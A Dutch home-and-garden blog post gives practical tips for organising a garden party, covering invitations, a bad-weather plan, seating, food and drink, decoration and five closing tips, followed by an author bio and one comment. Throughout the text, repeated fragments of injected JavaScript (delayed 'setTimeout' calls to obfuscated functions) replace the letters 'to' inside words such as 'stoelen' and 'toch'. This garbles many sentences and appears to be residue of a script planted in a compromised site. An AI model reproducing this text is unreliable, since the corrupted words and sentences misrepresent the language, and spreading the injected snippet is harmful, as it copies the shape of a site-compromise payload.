Tuinfeest? Zo organiseer je dat!

De zomer is de ideale periode voor tuinfeest. Een tuinfeest is een geweldige manier om met vrienden en familie een onvergetelijke avond te hebben. Tuinfeesten zijn super zomers en het enige wat je nodig hebt is je eigen achtertuin! Klink allemaal leuk hoor, zo’n tuinfeest. Maar hoe organiseer je dit nou?

Tuinfeest

Wie mogen absoluut niet ontbreken?

Bedenk voordat je gaat beginnen goed na over wie je wilt uitnodigen. Welke gasten mogen echt niet ontbreken op dit tuinfeest? Het maakt overigens niet uit als mensen elkaar nog niet kennen. Op tuinfeesten lopen gebruikelijk alle gasten de hele avond door elkaar heen, zo leer je vanzelf iedereen kennen.

De uitnodiging

Kies ruim van te voren een datum uit zodat de meeste mensen kunnen komen. Je kunt je gasten uitnodigen met een kaartje, maar ook een WhatsApp invite is tegenwoordig een handige en snelle manier. Dan kun je gelijk vragen of iedereen een reactie kan geven of ze komen. Wel zo makkelijk voor de boodschappen.

Wat ook handig is, is om van te voren je buren in te lichten over het feestje of nodig ze ook gezellig uit!

Goede voorbereiding is het halve werk!

Zodra je weet hoeveel mensen er op het tuinfeest komen kun je starten met de voorbereidingen. Hoe beter je het tuinfeest voorbereid des te minder stress je zal hebben op de avond zelf. Er is veel meer voor te bereiden dan je denkt.

Uiteraard ga je er van uit dat het stralend weer is, maar mocht het nu dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch op het laatste moment slecht weer zijn, zorg dan dat je een slecht-weer scenario hebt. Dit scenario moet natuurlijk minstens net zo leuk zijn. Zet bijvoorbeeld een grote partytent neer in de tuin en zorg voor vrolijke decoratie en sfeerverlichting. Om zeker te weten dat de gasten het niet koud krijgen kun je een terrasheater, vuurkorf aanzetten of fleecedekentjes klaarleggen.

Tafels en Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelen

Op tuinfeesten is het gebruikelijk dat mensen voornamelijk rondlopen, maar zorg ook voor voldoende tafels en sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelen. Aan het eind van de avond wordt iedereen vaak wat moe en dan kan iedereen zitten. Als je zelf niet voldoende tafels en sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelen hebt, kun je vragen of de gasten sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelen mee kunnen nemen of je kunt je creativiteit gebruiken. Zo kan een behangtafel ook prima als buffettafel dienen.

Eten en Drinken

Misschien wel het belangrijkste onderdeel van de avond; het eten en drinken. Dit kun je op meerdere manieren organiseren. Zo kun je veel mensen al enorm gelukkig maken met een traditionele BBQ, maar je kunt ook een keer wat anders doen. Probeer je gasten juist te verrassen met wat nieuws zodat dit feest onvergetelijk wordt! Bereid allemaal verschillende kleine hapjes voor in de vorm van een tappas buffet of vraag juist aan alle gasten om wat mee te nemen naar het tuinfeest. Hier nog wat praktische tips!

– Alles wat je zelf maakt smaakt dubbel zo lekker en wordt ook veel meer gewaardeerd.

– Zorg voor voldoende brood met verschillende smeersels en dips, maar overdrijf niet. Het zou dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch zonde zijn als er hierdoor geen ruimte meer is voor al dat andere lekkers?

– Zorg voor een feestelijk welkomsdrankje. Zo staat iedereen gelijk met een drankje in zijn handen en kan de avond worden geopend. Vries van te voren ijsblokjes in met bijvoorbeeld munt en fruit. Dit geeft een extra feestelijk effect in het glas.

– Zorg dat alle drankjes goed gekoeld kunnen worden. Regel indien nodig een extra koelkast of vul een kruiwagen of emmers met ijsblokjes. Dit houdt niet alleen de drankjes goed koel, maar past ook goed in het thema van een tuinfeest.

– Afwassen is niet voor iedereen een hobby. Tegenwoordig bestaat er veel plastic wegwerp servies van goede kwaliteit. Dit is niet alleen eco vriendelijk, maar ziet er ook nog eens leuk uit.

Zorg voor de sfeer

Voordat je begint met de aankleding van de tuin is het slim om over de indeling na te denken. Waar wil je dat alle tafels, sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelen, partytenten en bbq’s komen te staan? Als je de indeling hebt bedacht kun je aan de slag gaan. Het is jouw tuin, dus leef je helemaal uit.

Je kunt er voor kiezen om het tuinfeest een thema te geven. Dit kun je in de uitnodiging aan je gasten laten weten zodat zij zich op de dress-code kunnen voorbereiden. Ook kun je het thema doorvoeren in de hapjes, drankjes en de aankleding van het feest.

Dek van te voren de tafel of zet het lopend buffet feestelijk klaar. Dit maakt direct bij binnenkomt een verpletterende indruk op je gasten. Zorg voor een bloemetje op tafel en doe het nodige onderhoud aan de tuin. Ook passende achtergrond muziek zorgt voor de nodige sfeer.

Gebruik kaarsen, fakkels, lampionnen en vuurkorven om ook in de avond voldoende licht te hebben.

5 tips voor een geslaagd tuinfeest

1. Zorg voor zonnebrand

Tuinfeesten beginnen vaak tegen het einde van de middag, dan kan de zon behoorlijk fel zijn. Zorg voor zonnebrand zodat je gasten zich kunnen beschermen tegen de zon.

2. Vermaak de kinderen

Als er ook kinderen op het tuinfeest aanwezig zijn is het verstandig om je extra voor te bereiden. Zo kun je bijvoorbeeld een aparte kindertafel maken met knutselspullen en spelletjes zodat ze zich kunnen vermaken. Vergeet niet, je bent in de tuin, sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepkrijt, balspelletjes en andere buiten activiteiten kunnen vast ook in en om de tuin!

3. Om bij weg te smelten…

Voor wie het nog niet weet… Marshmallows zijn heerlijk als je ze even boven het vuur houdt!

4. Opgeruimd staat netjes

Als je een prullenbak of afvalemmer buiten zet, kan iedereen afval weggooien en blijft het niet op tafel slingeren. Je wil natuurlijk wel dat het feest ook gedurende de avond er gezellig uit blijft zien.

5. Ontspan en Geniet

Als de avond eenmaal daar is, kun je genieten. En als je onverwachts dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch nog iets vergeten bent dan ben jij waarschijnlijk de enige die die door heeft. Laat het daarom los, wees creatief en geniet. Dit is immers het moment waar je al zo lang naar uit kijkt!

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

1 Reactie op "Tuinfeest? Zo organiseer je dat!"

  • comment-avatar
    Yvan Zwaag 1 augustus 2017 (10:45)

    Bedankt voor de tips! Ik vind het idee op de foto’s met kleedjes op de grond vooral erg apart, lijkt me een hele gezellig, picknick, sfeer!

Plaats een reactie:

Je emailadres wordt niet weergegeven.